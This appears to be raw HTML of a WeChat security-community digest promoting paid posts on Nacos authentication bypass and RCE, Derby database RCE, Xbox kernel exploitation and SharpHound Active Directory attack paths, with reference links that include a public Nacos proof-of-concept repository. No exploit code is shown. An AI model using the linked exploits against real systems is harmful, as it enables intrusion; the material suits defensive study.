data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDDqH7DkldLFvPAYfV8kHaXQiaze1lwygTCH27co2CtIuJt7TpKKqAjVg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDDqH7DkldLFvPAYfV8kHaXQiaze1lwygTCH27co2CtIuJt7TpKKqAjVg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855418254422481"></mp-common-miniprogram></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100003720" data-ratio="1.025925925925926" data-s="300,640" style="width: 445px;height: 456px;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9e3acd63&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDvbwewW5bbYIZGD6TPtCk6Fkr4GXrCbI7QWtPZd8vGDufjactd5NZlw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100003726" data-ratio="0.16944444444444445" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=b2739a57&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDMUmNubQW7M3natkEicz6kD3egvhFjC3SI7xIJTP0VNSLF3N1KsOSUzg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100003727" data-ratio="0.5962962962962963" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=978029cc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDOteVcGiaickbLjmDRdSeXZx11SFa4iblEic44sgnbiaLVkMpuyNz0hzcypQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02 2021: 特定端点身份验证绕过漏洞（CVE-2021-29442）</span></h3><section><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDudlOYDCuXF9UN7esILibSfYENCq8S06fpWup7xHJkyXM2icHGxsiakApA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDudlOYDCuXF9UN7esILibSfYENCq8S06fpWup7xHJkyXM2icHGxsiakApA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855418254422481"></mp-common-miniprogram></section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03 2023: Derby数据库实现RCE的方法</span></h3><section><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDjKI1Q6lnm6h4KEcibX7icReIeSEyw3ibpTENUxJaqkOjFTpE0pBFd5RGg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDjKI1Q6lnm6h4KEcibX7icReIeSEyw3ibpTENUxJaqkOjFTpE0pBFd5RGg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855418254422481"></mp-common-miniprogram></section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04 2024: 公开nacos 0day漏洞执行远程代码攻击</span></h3><section><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDMI0tM0lKxdXwx6ciclt2QJJtEPu9icgzicib0snCp3ABSmianSLichl9Foibw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDMI0tM0lKxdXwx6ciclt2QJJtEPu9icgzicib0snCp3ABSmianSLichl9Foibw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855418254422481"></mp-common-miniprogram></section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05 Xbox系统内核漏洞利用</span></h3><section><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLD4YKKzrY0Ul8Fusqno0diaQDHHO3vm2jc2GWicm7PiaI5tibHEhDib4GHJIQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLD4YKKzrY0Ul8Fusqno0diaQDHHO3vm2jc2GWicm7PiaI5tibHEhDib4GHJIQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855418251421242"></mp-common-miniprogram></section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x06 利用Ollama插件在本地重命名Binary Ninja函数和变量</span></h3><section><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDicxHCKIb9EcEGbAqFaBuIibLA6m6CtEGX4icDnbIZYl38yaUwQYBxqmAg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDicxHCKIb9EcEGbAqFaBuIibLA6m6CtEGX4icDnbIZYl38yaUwQYBxqmAg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855418282182281"></mp-common-miniprogram></section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x07 利用SharpHound工具进行Active Directory攻击路径管理和检测</span></h3><section><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDw9LeF5fzqeMWJSa45qBYCzJmhRHwCXUjVJib8U0mgR9PdMK2VSHiaIlg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDw9LeF5fzqeMWJSa45qBYCzJmhRHwCXUjVJib8U0mgR9PdMK2VSHiaIlg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855418281542452"></mp-common-miniprogram></section><section style="color: rgb(0, 0, 0);font-size: 16px;letter-spacing: 0em;word-spacing: 0em;text-wrap: wrap;margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;line-height: 1.5em;word-break: break-word;text-align: left;"><h3 style="color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-align: left;text-wrap: wrap;margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x08 字符集差异：为何编码重要</span></h3><section style="color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;"><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLD28Ut0sMMmVILVenJzw5svJdTuGEmFGlnR1B59c5RflHX0HtFLr0LGw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLD28Ut0sMMmVILVenJzw5svJdTuGEmFGlnR1B59c5RflHX0HtFLr0LGw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844218552455828"></mp-common-miniprogram></section><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x09 无需进程注入的新型代码执行方法</span></h3><section><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDUp6ib4NWxDQFlOxnDOmvIcTuoqEuIXDeMcK0fKJHptFhgng0eebqSuw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn0AnIVBNwIS6v6Ux37cfLDUp6ib4NWxDQFlOxnDOmvIcTuoqEuIXDeMcK0fKJHptFhgng0eebqSuw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844218552451818"></mp-common-miniprogram></section><pre style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="margin-bottom: -7px;display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/98Nz5LFElxzdExAnJcAwRIq2IIHILR4B4jrwEPb1lOJkr0MbPEpgEGkibpic5JdqX37KQGhyH9pyMEjvn4Ve17KgmCXxV6NBIw/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 558px;border-radius: 5px;"></span><code style="padding: 15px 16px 16px;overflow-x: auto;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;">部分能力后期会开放，比如知识库/迪斯科等，星球身份是后期各服务的通行证<br/>AI目前比较贵，为了可持续发展，设置了星球的地板价<span style="color: rgb(209, 154, 102);line-height: 26px;">25</span>元(系统最低价)</code></pre><p style="text-align: center;"><img class="rich_pages wxw-img js_darkmode__16" data-galleryid="" data-imgfileid="100003724" data-ratio="0.575925925925926" data-s="300,640" style="visibility: visible !important;width: 657px !important;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=4479a031&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnoZE3o2M5pWUSdvydKbsn5xaQ0PicicMvUtGqYwKthtBwkQ0YY4jQ69HMp6mQnK9n7LN8Mpvc8JSGg%2F640%3Fwx_fmt%3Dother%26from%3Dappmsg%26tp%3Dwebp%26wxfrom%3D5%26wx_lazy%3D1%26wx_co%3D1"/></p></section><section style="letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);border-radius: 0px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;margin-top: 30px;margin-bottom: 15px;"><p><span style="color: rgb(0, 0, 0);font-size: 18px;"><span style="display: block;letter-spacing: 0em;line-height: 1.5em;"><strong>参考资料</strong></span></span></p></section><section style="letter-spacing: normal;text-align: start;text-wrap: wrap;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-radius: 0px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;height: auto;margin-bottom: 0px;width: auto;"><p><span style="color: rgba(0, 0, 0, 0.6);font-family: ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 11.2px;"><span style="display: inline;letter-spacing: 0em;line-height: 1.8em;padding-top: 2px;width: 30.3984px;">[1]</span></span>《Nacos安全漏洞导致无认证SQL执行》: <em style="border-radius: 0px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);color: rgb(0, 0, 0);height: auto;width: auto;"><a href="https://github.com/alibaba/nacos/issues/4463" target="_blank">https://github.com/alibaba/nacos/issues/4463</a></em></p><p><span style="color: rgba(0, 0, 0, 0.6);font-family: ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 11.2px;"><span style="display: inline;letter-spacing: 0em;line-height: 1.8em;padding-top: 2px;width: 30.3984px;">[2]</span></span>《特定端点身份验证绕过漏洞（CVE-2021-29442）》: <em style="border-radius: 0px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);color: rgb(0, 0, 0);height: auto;width: auto;"><a href="https://github.com/advisories/GHSA-xv5h-v7jh-p2qh" target="_blank">https://github.com/advisories/GHSA-xv5h-v7jh-p2qh</a></em></p><p><span style="color: rgba(0, 0, 0, 0.6);font-family: ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 11.2px;"><span style="display: inline;letter-spacing: 0em;line-height: 1.8em;padding-top: 2px;width: 30.3984px;">[3]</span></span>《Derby数据库实现RCE的方法》: <em style="border-radius: 0px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);color: rgb(0, 0, 0);height: auto;width: auto;"><a href="http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce" target="_blank">http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce</a></em></p><p><span style="color: rgba(0, 0, 0, 0.6);font-family: ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 11.2px;"><span style="display: inline;letter-spacing: 0em;line-height: 1.8em;padding-top: 2px;width: 30.3984px;">[4]</span></span>《公开nacos 0day漏洞执行远程代码攻击》: <em style="border-radius: 0px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);color: rgb(0, 0, 0);height: auto;width: auto;"><a href="https://github.com/ayoundzw/nacos-poc" target="_blank">https://github.com/ayoundzw/nacos-poc</a></em></p><p><span style="color: rgba(0, 0, 0, 0.6);font-family: ptima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 